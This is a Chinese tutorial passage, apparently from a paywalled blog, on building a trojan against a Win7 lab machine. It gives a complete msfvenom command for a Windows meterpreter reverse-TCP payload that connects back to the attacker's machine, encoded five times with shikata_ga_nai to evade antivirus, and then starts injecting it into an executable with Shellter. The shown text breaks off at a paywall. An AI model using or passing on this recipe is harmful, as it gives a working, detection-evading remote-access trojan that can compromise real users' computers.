原理
利用msf模块中的msfvenom模块,首先生成.exe木马文件,用靶机打开,攻击成功后,就渗透到了靶机系统中。
准备
win7靶机 ip :192.168.56.130
kali攻击机 ip: 192.168.56.135
##实战开始
1.打开kali机,在命令行输入:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.135 lport=1234 -e x86/shikata_ga_nai -i 5 -f exe >/home/kali/Desktop/1.exe
LHOST是主机的ip,用来“提醒”木马成功后应该返回信息给自己的主机。
lport是返回时连接的端口号,需要开启tcp功能,1234端口好像默认开启?
> 后面的那一串表示木马生成的对应地址,为了方便操作我直接生成在桌面上。
-e x86/shikata_ga_nai 为使用shikata_ga_nai的编码方式对攻击载荷进行重新编码
-i 5为使用刚才设定的编码方式对目标进行5次编码
2.命令行输入
shellter
第一个选项选择A
3.PE Target 后面填写/home/kali/Desktop/1.exe,即木马所在路径。
然后等待一段时间······

最低0.47元/天 解锁文章
1万+





